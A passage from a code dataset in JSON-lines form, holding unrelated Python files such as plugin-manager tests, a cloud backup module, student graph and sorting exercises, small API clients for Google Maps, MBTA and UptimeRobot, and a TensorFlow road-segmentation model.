test_plugin_manager_init_single_hook(self, get_nodes_plugin):\n pm = PluginManager(plugins=[get_nodes_plugin])\n assert len(pm.hooks) == 1\n\n assert \"get_nodes\" in pm.hooks\n assert len(pm.hooks[\"get_nodes\"]) == 1\n assert pm.hooks[\"get_nodes\"][0] == get_nodes_plugin.get_nodes\n\n def test_plugin_manager_init_single_hook_multiple_methods(self, get_nodes_plugins):\n pm = PluginManager(plugins=get_nodes_plugins)\n assert len(pm.hooks) == 1\n\n assert \"get_nodes\" in pm.hooks\n assert len(pm.hooks[\"get_nodes\"]) == 2\n assert pm.hooks[\"get_nodes\"][0] == get_nodes_plugins[0].get_nodes\n assert pm.hooks[\"get_nodes\"][1] == get_nodes_plugins[1].get_nodes\n\n def test_plugin_manager_init_multiple_hooks(self, get_nodes_plugin, get_artifacts_plugin):\n pm = PluginManager(plugins=[get_nodes_plugin, get_artifacts_plugin])\n assert len(pm.hooks) == 2\n\n assert \"get_nodes\" in pm.hooks\n assert len(pm.hooks[\"get_nodes\"]) == 1\n assert pm.hooks[\"get_nodes\"][0] == get_nodes_plugin.get_nodes\n\n assert \"get_manifest_artifacts\" in pm.hooks\n assert len(pm.hooks[\"get_manifest_artifacts\"]) == 1\n assert pm.hooks[\"get_manifest_artifacts\"][0] == get_artifacts_plugin.get_manifest_artifacts\n\n def test_get_nodes(self, get_nodes_plugins):\n pm = PluginManager(plugins=get_nodes_plugins)\n nodes = pm.get_nodes()\n assert len(nodes.models) == 2\n\n def test_get_manifest_artifact(self, get_artifacts_plugins):\n pm = PluginManager(plugins=get_artifacts_plugins)\n artifacts = pm.get_manifest_artifacts(None)\n assert len(artifacts) == 2\n","sub_path":"tests/unit/test_plugin_manager.py","file_name":"test_plugin_manager.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"610082893","text":"from __future__ import with_statement\n\nimport sys\nimport logging\n\nfrom scalarizr import storage2, util\nfrom scalarizr.libs import bases\n\nLOG = logging.getLogger(__name__)\n\n\nclass Error(Exception):\n pass\n\n\nbackup_types = {}\nrestore_types = {}\n\n\ndef backup(*args, **kwds):\n if args:\n if isinstance(args[0], dict):\n return backup(**args[0])\n else:\n return args[0]\n type_ = kwds.get('type', 'base')\n try:\n cls = backup_types[type_]\n except KeyError:\n msg = \"Unknown backup type '%s'. \" \\\n \"Have you registered it in \" \\\n \"scalarizr.services.backup.backup_types?\" % type_\n raise Error(msg)\n return cls(**kwds)\n\n\ndef restore(*args, **kwds):\n if args:\n if isinstance(args[0], dict):\n return restore(**args[0])\n else:\n return args[0]\n type_ = kwds.get('type', 'base')\n try:\n cls = restore_types[type_]\n except KeyError:\n msg = \"Unknown restore type '%s'. \" \\\n \"Have you registered it in \" \\\n \"scalarizr.services.backup.restore_types?\" % type_\n raise Error(msg)\n return cls(**kwds)\n\n\nclass Backup(bases.Task):\n features = {\n 'start_slave': True\n }\n\n def __init__(self,\n type='base',\n description=None,\n tags=None,\n **kwds):\n super(Backup, self).__init__(\n type=type,\n description=description,\n tags=tags or {},\n **kwds)\n\n\nclass Restore(bases.Task):\n\n features = {\n 'master_binlog_reset': False\n }\n '''\n When 'master_binlog_reset' = False,\n rolling this restore on Master causes replication binary log reset.\n Slaves should start from the binary log head. Detecting the first\n position in binary log is implementation dependent and Master is\n responsible for this.\n '''\n\n def __init__(self,\n type='base',\n **kwds):\n super(Restore, self).__init__(\n type=type,\n **kwds)\n\n\nbackup_types['base'] = Backup\nrestore_types['base'] = Restore\n\n\nclass SnapBackup(Backup):\n\n def __init__(self,\n volume=None,\n **kwds):\n super(SnapBackup, self).__init__(\n volume=volume,\n **kwds)\n self.define_events(\n # Fires when all disk I/O activity should be freezed\n 'freeze',\n # Fires when all disk I/O activity should be resumed\n 'unfreeze'\n )\n\n def _run(self):\n self.volume = storage2.volume(self.volume)\n LOG.debug('Volume obj: %s', self.volume)\n LOG.debug('Volume config: %s', dict(self.volume))\n state = {}\n self.fire('freeze', self.volume, state)\n try:\n snap = self.volume.snapshot(self.description, tags=self.tags)\n finally:\n self.fire('unfreeze', self.volume, state)\n try:\n util.wait_until(lambda: snap.status() in (snap.COMPLETED, snap.FAILED),\n start_text='Polling snapshot status (%s)' % snap.id,\n logger=LOG)\n except:\n if 'Request limit exceeded' in str(sys.exc_info()[1]):\n pass\n else:\n raise\n if snap.status() == snap.FAILED:\n msg = 'Backup failed because snapshot %s failed' % snap.id\n raise Error(msg)\n return restore(\n type=self.type,\n snapshot=snap,\n **state)\n\n\nclass SnapRestore(Restore):\n\n def __init__(self, snapshot=None, volume=None, **kwds):\n super(SnapRestore, self).__init__(\n snapshot=snapshot,\n volume=volume,\n **kwds)\n\n\n def _run(self):\n self.snapshot = storage2.snapshot(self.snapshot)\n if self.volume:\n self.volume = storage2.volume(self.volume)\n self.volume.snap = self.snapshot\n self.volume.ensure()\n else:\n self.volume = self.snapshot.restore()\n return self.volume\n\n\nbackup_types['snap'] = SnapBackup\nrestore_types['snap'] = SnapRestore\n","sub_path":"src/scalarizr/services/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":4450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"501196061","text":"#!/bin/usr/python3\n\nclass Node(object):\n def __init__(self,name):\n self.neighbours = []\n self.visited = False\n self.name = name\n \n \nclass Graph1(object):\n \n def __init__(self):\n self.graph_dict = {}\n \n\n def depth_first_search(self,start):\n if self is None:\n return 0\n \n visit(start)\n start.visited = True\n for neighbour_node in start.neighbours:\n if neighbour_node.visited is False:\n depth_first_search(neighbour_node)\n \n\n def find_path(self,start,end,path=[]):\n if start is end:\n return None\n if start.value not in self.graph_dict:\n return None\n path.append(start)\n \n for list1 in self.graph_dict[start]:\n for node in list1:\n if node.name not in path:\n new_path = find_path(node,end)\n if new_path:\n return new_path\n \n return None \n \nclass Vertex(object):\n def __init__(self):\n self.distance = None\n self.predecessor = None\n self.marked = False\n self.neighbours = []\n \nclass Graph2(object):\n def __init__(self):\n self.graph_dict = {}\n \n def breadth_first_search(self,start):\n if self is None:\n return 0\n \n que = Queue()\n start.marked = True\n que.add(start)\n while not que:\n node = que.remove()\n visit(node)\n for n in node.neighbours:\n if node.marked is False:\n node.marked = True\n que.remove(node)\n \n \n \n \n \n \n ","sub_path":"Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"645543240","text":"\n###########################################\n# DSFG ~ Katie House ~ 8/14/18\n# DESCTIPTION: List Google Drive links for Automan\n# INPUT: Google Drive File ID\n# OUTPUT: Google Drive Folder ID\n###########################################\n\nfrom __future__ import print_function\nfrom apiclient.discovery import build\nfrom httplib2 import Http\nfrom oauth2client import file as oauth_file, client, tools\nfrom apiclient import errors\n\n\ndef print_parents(service, file_id):\n \"\"\"Print a file's parents.\n\n Args:\n service: Drive API service instance.\n file_id: ID of the file to print parents for.\n \"\"\"\n try:\n parents = service.parents().list(fileId=file_id).execute()\n for parent in parents['items']:\n print('File Id: %s' % parent['id'])\n except error:\n print('An error occurred: %s' % error)\n\ndef main(): \n store = oauth_file.Storage('token.json')\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets('credentials.json', SCOPES)\n creds = tools.run_flow(flow, store)\n service = build('drive', 'v2', http=creds.authorize(Http()))\n\n # List all image links in a .txt file\n print_parents(service, '1_3g_aKodcJxYnuMZObePMN77AjnQlBmM')\n \nif __name__ == '__main__':\n main()\n ","sub_path":"preprocessing/townhall-data/links-for-automan/get-folder-id.py","file_name":"get-folder-id.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"134109208","text":"\n#삽입정렬 : while\n#class화 시키기 -> 버블, 선택\n\nimport random\n\ndef m_list(x,list):\n for i in range(x):\n a = random.randrange(1,101)\n list.append(a)\n\ndef insertion(x):\n while x < (len(lst)):\n for i in range(0,x):\n if lst[x] < lst[i]:\n space = lst[x]\n lst[x] = lst[i]\n lst[i] = space\n x += 1\n\ni = int(input(\">>\"))\n\nlst = []\nm_list(i,lst)\n\ncopy = 1\ninsertion(copy)\nspace = 0\n\nprint(lst)","sub_path":"insertion.py","file_name":"insertion.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"277199591","text":"# Import pandas as pd\nfile = '../_datasets/log_file.txt'\nimport pandas as pd\nimport numpy as np\n\ncol1 = []\n\ncol2 = []\n\ncol3 = []\n\nwith open(file) as f:\n txt = f.readlines()\n\nprint(txt,txt[0],txt[1])\n\nprint(txt[0].split(']')[0].strip('['))\nprint(txt[0].split(' ')[1])\nprint(txt[0].split(' ')[2])\n# print(txt[0].split(']')[0].strip('['))\n\nfor line in txt:\n\n ss=line.split(' ',2)\n\n s=line.split(']')[0].strip('[')\n\n # dt = datetime.strptime(s1, dtfmt)\n\n col1.append(s)\n\n s1=line.split(' ')[1].strip()\n\n col2.append(s1)\n\n if len(line) > (len(s)+len(s1)):\n\n col3.append(ss[2].strip('\\n'))\n\n else:\n\n col3.append(np.nan)\n\ndf = pd.DataFrame([col1, col2, col3])\n\ndf = df.T\n\ndf.columns=['ID','Event_name', 'Message']\n\n# Assign the filename: file\n\n# Read the file into a DataFrame: df\n#df = pd.read_csv(file)\n\n# View the head of the DataFrame\nprint(df.head())","sub_path":"05-importing-data-in-python-(part-1)/1-introduction-and-flat-files/Reading-flat-log-file.py","file_name":"Reading-flat-log-file.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"252949470","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\nimport sys\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QLabel, QWidget\n\n\nclass Example(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI();\n\n def initUI(self):\n label1 = QLabel(\"Label 1 \", self)\n label1.move(10, 10)\n\n label2 = QLabel(\"Label 1 \", self)\n label2.move(20, 20)\n\n label3 = QLabel(\"Label 1 \", self)\n label3.move(30, 30)\n\n self.setGeometry(100, 100, 500, 500)\n self.setWindowTitle('absolute ')\n self.show()\n\n # def keyPressEvent(self, e):\n # if e.key() == Qt.Key_Escape:\n # self.close()\n\n def keyPressEvent(self, e):\n if e.key() == Qt.Key_Escape:\n self.close()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())\n","sub_path":"com/slkk/pyqt/escape.py","file_name":"escape.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"24305216","text":"import socket\r\nfrom threading import Thread\r\n\r\nnickname = input('Please enter your nickname ')\r\n\r\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\nipAdress = '127.0.0.1'\r\nport = 5080\r\n\r\nclient.connect((ipAdress, port))\r\n\r\nprint(\"Connected with server\")\r\n\r\ndef receive():\r\n while True:\r\n try:\r\n message = client.recv(2048).decode('utf-8')\r\n\r\n if message == 'NICKNAME':\r\n client.send(nickname.encode('utf-8'))\r\n else:\r\n print(message)\r\n except:\r\n print(\"An error occured\")\r\n client.close()\r\n break\r\n\r\ndef write():\r\n while True:\r\n message = '{} : {}'.format(nickname, input(''))\r\n client.send(message.encode('utf-8'))\r\n\r\nreceive_thread = Thread(target = receive)\r\nreceive_thread.start()\r\nwrite_thread = Thread(target = write)\r\nwrite_thread.start()","sub_path":"quizclient.py","file_name":"quizclient.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"650564439","text":"import string\n\ntext = open(\"oldman.txt\", \"r\")\n\nUniqueWords = dict() # creates an empty ditionary called new\n\nfor line in text:\n\n line = line.strip()\n\n line = line.lower()\n\n #Removing the punctuation marks from the line\n line = line.translate(line.maketrans(\"\", \"\", string.punctuation))\n\n # Split the line into words\n words = line.split(\" \")\n\n for word in words: \n if word in UniqueWords:\n UniqueWords[word] = UniqueWords[word] + 1\n else:\n UniqueWords[word] = 1\n\nfor key in UniqueWords.keys():\n print(key, \":\", UniqueWords[key])\n\n ","sub_path":"assignment/fileAndException_handling/uniqueAndFrequency.py","file_name":"uniqueAndFrequency.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"96087480","text":"import numpy as np\n\n''' read_CSIRO.py\n\nThis script loads the global sea level data from CSIRO file\n\nParameters: \nfile = Full path to file for loading\ncenteryear = Year at which the data should be centered (default: 2005)\n\nReturn: \nX1 = Matrix containing latitude, longitude, and years of record (lat and lon set to 1e6)\nY = Sea level data\ndY = Uncertainty around sea level data\nregions = Region identifer\nregionsu = ?\nsitenames = \"CSIRO GSL\"\nsitecoords = [1e6 1e6]\nsitelen = Length of the global sea level record\nsitecoastline = 0\n\nNote: This function returns many fields that are not necessary when dealing with a global\ndata set. The reason for having them though is to maintain commonalities with the full\nReadPSMSLData.m code from the original K14 workflow.\n\n'''\n\ndef read_CSIRO(file, centeryear=2005):\n\t\n\t# Open the file\n\tdata = np.loadtxt(file, skiprows=1, delimiter=',')\n\t\n\t# Extract the data\n\tyears = data[:,0]\n\trsl = data[:,1]\n\trslunc = data[:,2]/2\n\t\n\t# Center the data on the required year\n\tcenteryear_ind = np.argmin(np.abs(years - centeryear))\n\trsl = rsl - rsl[centeryear_ind]\n\t\n\t# Populate the output variables\n\tX1 = np.hstack((1e6*np.ones((len(years),2)), years.reshape((-1,1))))\n\tregions = np.zeros(len(years))\n\tY = rsl\n\tdY = rslunc\n\tsitelen = len(rsl)\n\tregionsu = 0\n\tsitenames = \"CSIRO GSL\"\n\tsitecoords = np.array([1e6,1e6])\n\tsitecoastline = 0\n\t\n\treturn(X1,Y, dY, regions, regionsu, sitenames, sitecoords, sitelen, sitecoastline)","sub_path":"modules/tlm/sterodynamics/read_CSIRO.py","file_name":"read_CSIRO.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"257334042","text":"import os.path\nimport tensorflow as tf\nimport helper\nimport warnings\nfrom distutils.version import LooseVersion\nimport tests\n\n\nprint('TensorFlow Version: {}'.format(tf.__version__))\nassert (LooseVersion(tf.__version__) >= LooseVersion('1.0'),\n 'Please use TensorFlow version 1.0 or newer.')\n\nif not tf.test.gpu_device_name():\n warnings.warn('No GPU found.')\nelse:\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\n\n\ndef load_vgg(sess, vgg_path):\n tf.saved_model.loader.load(sess, ['vgg16'], vgg_path)\n graph = tf.get_default_graph()\n\n image_input = graph.get_tensor_by_name('image_input:0')\n keep_prob = graph.get_tensor_by_name('keep_prob:0')\n layer3 = graph.get_tensor_by_name('layer3_out:0')\n layer4 = graph.get_tensor_by_name('layer4_out:0')\n layer7 = graph.get_tensor_by_name('layer7_out:0')\n \n return image_input, keep_prob, layer3, layer4, layer7\n\ntests.test_load_vgg(load_vgg, tf)\n\n\ndef layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes):\n layer3 = tf.layers.conv2d(vgg_layer3_out, num_classes, 1, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n layer4 = tf.layers.conv2d(vgg_layer4_out, num_classes, 1, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n layer7 = tf.layers.conv2d(vgg_layer7_out, num_classes, 1, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n decode1 = tf.layers.conv2d_transpose(layer7, num_classes, 4, 2, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n decode2 = tf.add(decode1, layer4)\n decode3 = tf.layers.conv2d_transpose(decode2, num_classes, 4, 2, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n decode4 = tf.add(decode3, layer3)\n output = tf.layers.conv2d_transpose(decode4, num_classes, 16, 8, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n return output\n\ntests.test_layers(layers)\n\n\ndef optimize(nn_last_layer, correct_label, learning_rate, num_classes):\n logits = tf.reshape(nn_last_layer, (-1, num_classes))\n labels = tf.reshape(correct_label, (-1, num_classes))\n\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels)\n cross_entropy_loss = tf.reduce_mean(cross_entropy)\n\n optimizer = tf.train.AdamOptimizer(learning_rate)\n train_op = optimizer.minimize(cross_entropy_loss)\n\n return logits, train_op, cross_entropy_loss\n\ntests.test_optimize(optimize)\n\n\ndef train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate):\n sess.run(tf.global_variables_initializer())\n print('Training...')\n print()\n\n for epoch in range(epochs):\n print('EPOCH {} ...'.format(epoch+1))\n\n for image, label in get_batches_fn(batch_size):\n _, loss = sess.run([train_op, cross_entropy_loss],\n feed_dict={input_image: image, correct_label: label,\n keep_prob: 0.5, learning_rate: 0.0005})\n print('Loss: {}'.format(loss))\n \n print()\n\ntests.test_train_nn(train_nn)\n\n\ndef run():\n num_classes = 2\n image_shape = (160, 576)\n data_dir = './data'\n runs_dir = './runs'\n\n tests.test_for_kitti_dataset(data_dir)\n helper.maybe_download_pretrained_vgg(data_dir)\n\n # OPTIONAL: Train and Inference on the cityscapes dataset instead of the Kitti dataset.\n # Needs a GPU with at least 10 teraFLOPS to train on.\n # https://www.cityscapes-dataset.com/\n\n with tf.Session() as sess:\n vgg_path = os.path.join(data_dir, 'vgg')\n get_batches_fn = helper.gen_batch_function(os.path.join(data_dir, 'data_road/training'), image_shape)\n\n epochs = 50\n batch_size = 5\n\n correct_label = tf.placeholder(tf.int32, [None, None, None, num_classes])\n learning_rate = tf.placeholder(tf.float32)\n\n input_image, keep_prob, layer3, layer4, layer7 = load_vgg(sess, vgg_path)\n output = layers(layer3, layer4, layer7, num_classes)\n logits, train_op, cross_entropy_loss = optimize(output, correct_label, learning_rate, num_classes)\n\n train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate)\n\n helper.save_inference_samples(runs_dir, data_dir, sess, image_shape, logits, keep_prob, input_image)\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"424640969","text":"import urllib.request\nimport json\n# from googlemaps import GoogleMaps\nfrom pprint import pprint\n\n\n\n# Useful URLs (you need to add the appropriate parameters for your requests)\nGMAPS_BASE_URL = \"http://maps.googleapis.com/maps/api/geocode/json?\"\nMBTA_BASE_URL = \"http://realtime.mbta.com/developer/api/v2/stopsbylocation\"\nMBTA_DEMO_API_KEY = \"wX9NwuHnZU2ToO7GmGR9uw\"\n\n\n# A little bit of scaffolding if you want to use it\n\ndef get_json(url):\n \"\"\"\n Given a properly formatted URL for a JSON web API request, return\n a Python JSON object containing the response to that request.\n \"\"\"\n\n f = urllib.request.urlopen(url)\n response_text = f.read().decode('utf-8')\n response_data = json.loads(response_text)\n return response_data\n\n\n\n\ndef get_lat_long(place_name):\n \"\"\"\n Given a place name or address, return a (latitude, longitude) tuple\n with the coordinates of the given place.\n See https://developers.google.com/maps/documentation/geocoding/\n for Google Maps Geocode API URL formatting requirements.\n \"\"\"\n new_place = str()\n for letter in place_name:\n if letter is not ' ':\n new_place = new_place + letter\n else:\n new_place += '%20'\n\n\n url = GMAPS_BASE_URL +'address=' + new_place\n\n\n json_data = get_json(url)\n\n return json_data['results'][0]['geometry']['location']['lat'], json_data['results'][0]['geometry']['location']['lng']\n\n\n\ndef get_nearest_station(latitude, longitude):\n \"\"\"\n Given latitude and longitude strings, return a (station_name, distance)\n tuple for the nearest MBTA station to the given coordinates.\n See http://realtime.mbta.com/Portal/Home/Documents for URL\n formatting requirements for the 'stopsbylocation' API.\n \"\"\"\n\n\n\n MBTA_BASE_URL = \"http://realtime.mbta.com/developer/api/v2/stopsbylocation\"\n MBTA_DEMO_API_KEY = \"wX9NwuHnZU2ToO7GmGR9uw\"\n\n url_m = MBTA_BASE_URL +'?api_key=' + MBTA_DEMO_API_KEY + \"&lat=\" + str(latitude) + \"&lon=\" + str(longitude) + '&format=json'\n station_json = get_json(url_m)\n station_name = station_json['stop'][0]['stop_name']\n distance = station_json['stop'][0]['distance']\n distance = '{:.2f}'.format(float(distance))\n return (station_name, distance)\n\n\n\n\ndef find_stop_near(place_name):\n \"\"\"\n Given a place name or address, return the nearest MBTA stop and the \n distance from the given place to that stop.\n \"\"\"\n\n lat, lng = get_lat_long(place_name)\n return get_nearest_station(lat, lng)\n\n\n\nprint(find_stop_near('fenway park'))\n\n# find_stop_near('fenway')\n","sub_path":"src/mbta_helper.py","file_name":"mbta_helper.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"566116160","text":"\"\"\"\nMetoda bisectiei\n------------------\nSa se rezolve(aproximativ) ecuatia cosx=x pe interval[0,pi/2]\n\n//////////////////////////////////////////////////////////////////////////////////////////////////////\nMetoda bisectiei (injumatatirii intervalului pentru rezolvarea numericca aproximativa a ecuatiilor\"\"\"\nfrom math import cos\nfrom math import pi\ndef f(x):\n return cos(x)-x\n\na=float(eval(input('a=')))\nb=float(eval(input('b=')))\neps=float(input('eps='))\nc=(a+b)/2\nwhile abs(b-a) >=eps:\n if f(c)==0:\n print('radacina este', c)\n elif f(a)*f(c)<0:\n b=c\n else:\n a=c\n c=(a+b)/2\nprint('radacina aproximativa este ', format(c, '.5f'))\n","sub_path":"generate_nr_from_4/metoda bisectiei.py","file_name":"metoda bisectiei.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"228990429","text":"#!/usr/bin/env python3\n\nimport http.client\nimport json\nimport sys\nimport os\n\n\nAPI_KEY = os.environ.get('UPTIME_ROBOT_API_KEY')\nif API_KEY == None:\n\tprint(\"API Key not found. Be sure to set UPTIME_ROBOT_API_KEY environment variable.\")\n\tsys.exit()\n\n\nALERT_CONTACT_ID = os.environ.get('UPTIME_ROBOT_ALERT_CONTACTS')\nif API_KEY == None:\n\tprint(\"Alert contacts not set. Be sure to set ALERT_CONTACT_ID environment variable.\")\n\tsys.exit()\n\n\nINTERVAL = 60\nLIMIT = 50\nMONITORS = {'monitors': []}\n\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\ndef uptimeRequest(location,payload):\n\n\tdefault_payload = \"api_key=\"+ API_KEY\n\tdefault_payload += \"&format=json\"\n\n\tdefault_payload += payload\n\theaders = {\n \t\t'content-type': \"application/x-www-form-urlencoded\",\n \t\t'cache-control': \"no-cache\"\n\t}\n\tconn = http.client.HTTPSConnection(\"api.uptimerobot.com\")\n\tconn.request(\"POST\", location, default_payload, headers) \n\tres = conn.getresponse()\n\tdata = res.read()\n\treturn(json.loads(data))\n\ndef getMonitors(page = 1, offset = 0):\n\n\tpayload = \"&alert_contacts=1\"\n\tpayload += \"&offset=\"+str(offset)\n\tpayload += \"&limit=\"+str(LIMIT)\n \n\tdata = uptimeRequest(\"/v2/getMonitors\",payload)\n\t\n\tfor monitor in data['monitors']:\n\t\ti = len(MONITORS) + 1\n\t\tMONITORS['monitors'].append(monitor)\n\n\t#calculate pagination\n\tpage = int(page) + 1\n\toffset = (LIMIT * page) - LIMIT\n\tif offset < data['pagination']['total']:\n\t\tgetMonitors(page, offset)\n\ndef listMonitors():\n\tgetMonitors()\n\tfor monitor in MONITORS['monitors']:\n\n\t\tif monitor['status'] == 0:\n\t\t\tstatus = bcolors.OKGREEN + \"paused\" + bcolors.ENDC\n\t\telif monitor['status'] == 1:\n\t\t\tstatus = bcolors.OKGREEN + \"paused\" + bcolors.ENDC\n\t\telif monitor['status'] == 2:\n\t\t\tstatus = bcolors.OKGREEN + \"online\" + bcolors.ENDC\n\t\telse:\n\t\t\tstatus = bcolors.FAIL + \"offline\" + bcolors.ENDC\n\t\tprint(monitor['friendly_name'],status)\n\ndef listMonitorIdByName(name):\n\tgetMonitors()\n\tfor monitor in MONITORS['monitors']:\n\t\tif name == monitor['friendly_name']:\n\t\t\treturn(monitor['id'])\n\ndef deleteMonitorByName(name):\n\treturn deleteMonitorById(listMonitorIdByName(name))\n\ndef deleteMonitorById(id):\n\tpayload = \"&id=\"+str(id)\n\tprint(uptimeRequest(\"/v2/deleteMonitor\",payload))\n\n\ndef addMonitor(monitor_type, url):\n\n\t#types\n\t#1 - HTTP(s)\n\t#2 - Keyword\n\t#3 - Ping\n\t#4 - Port\n\t\n\t#sub types\n\t#1 - HTTP (80)\n\t#2 - HTTPS (443)\n\t#3 - FTP (21)\n\t#4 - SMTP (25)\n\t#5 - POP3 (110)\n\t#6 - IMAP (143)\n\t#99 - Custom Port\n\n\tif monitor_type == \"http\":\n\t\tMONITOR_TYPE = \"1\"\n\t\tSUB_TYPE = \"1\"\n\t\tPORT = \"\"\n\t\tURL = \"http://\"+url\n\telif monitor_type == \"https\":\n\t\tMONITOR_TYPE = \"1\"\n\t\tSUB_TYPE = \"2\"\n\t\tPORT = \"\"\n\t\tURL = \"https://\"+url\n\telif monitor_type == \"smtp\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"4\"\n\t\tPORT = \"\"\n\t\tURL = url\n\telif monitor_type == \"imap\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"6\"\n\t\tPORT = \"\"\n\t\tURL = url\n\telif monitor_type == \"ssh\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"99\"\n\t\tPORT = \"22\"\n\t\tURL = url\n\telif monitor_type == \"mysql\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"99\"\n\t\tPORT = \"3306\"\n\t\tURL = url\n\telif monitor_type == \"ping\":\n\t\tMONITOR_TYPE = \"3\"\n\t\tSUB_TYPE = \"\"\n\t\tPORT = \"\"\n\t\tURL = url\n\telse:\n\t\tprint(\"invalid monitor type\")\n\t\tsys.exit()\n\t\n\tFRIENDLY_NAME = url + \" \" + monitor_type\n\t\n\tpayload = \"&type=\"+MONITOR_TYPE\n\tif SUB_TYPE:\n\t\tpayload += \"&sub_type=\"+SUB_TYPE\n\tif PORT:\n\t\tpayload += \"&port=\"+PORT\n\tpayload += \"&url=\"+URL\n\tpayload += \"&friendly_name=\"+FRIENDLY_NAME\n\tpayload += \"&interval=\"+str(INTERVAL)\n\tpayload += \"&alert_contacts=\"+ALERT_CONTACT_ID\n\n\tprint(uptimeRequest(\"/v2/newMonitor\",payload))\n\ndef getAlertContacts():\n\tpayload = \"\"\n\n\tjson_results = uptimeRequest(\"/v2/getAlertContacts\",payload)\n\tfor alert_contact in json_results['alert_contacts']:\n\t\tprint(alert_contact['id'],alert_contact['friendly_name'])\n\nargs = sys.argv[1:]\n\nif len(args) == 0:\n\tlistMonitors()\n\nelif args[0] == \"monitors\":\n\tlistMonitors()\n\nelif args[0] == \"monitorid\":\n\tprint(listMonitorIdByName(args[1]))\n\nelif args[0] == \"contacts\":\n\tgetAlertContacts()\n\nelif args[0] == \"create\":\n\tif len(args) == 3:\n\t\taddMonitor(args[1], args[2])\n\telse:\n\t\tprint(\"invalid usage. \\n uptimerobot.py create \")\n\nelif args[0] == \"delete\":\n\tif len(args) == 2:\n\t\tdeleteMonitorById(args[1])\n\telse:\n\t\tprint(\"invalid usage. \\n uptimerobot.py delete \")\nelse:\n\tprint(\"invalid command. \\n\")\n\tprint(\"uptimerobot-cli monitors\")\n\tprint(\"uptimerobot-cli monitorid \")\n\tprint(\"uptimerobot-cli contacts\")\n\tprint(\"uptimerobot-cli create \")\n\tprint(\"uptimerobot-cli delete \")","sub_path":"uptimerobot.py","file_name":"uptimerobot.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"107434001","text":"\n\nfrom xai.brain.wordbase.nouns._paste import _PASTE\n\n#calss header\nclass _PASTES(_PASTE, ):\n\tdef __init__(self,): \n\t\t_PASTE.__init__(self)\n\t\tself.name = \"PASTES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"paste\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_pastes.py","file_name":"_pastes.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"533837239","text":"import numpy as np\nfrom multiprocessing import Queue, Value, Process\n\nfrom server.analysis.compressor._run import _run\n\n\nclass Compressor:\n def __init__(self):\n self._is_running = Value(\"i\", False)\n self._input_image_queue = Queue()\n self._output_image_queue = Queue()\n self._process = None\n\n def start(self):\n self._process = Process(\n target=_run,\n args=(self._input_image_queue, self._output_image_queue, self._is_running)\n )\n 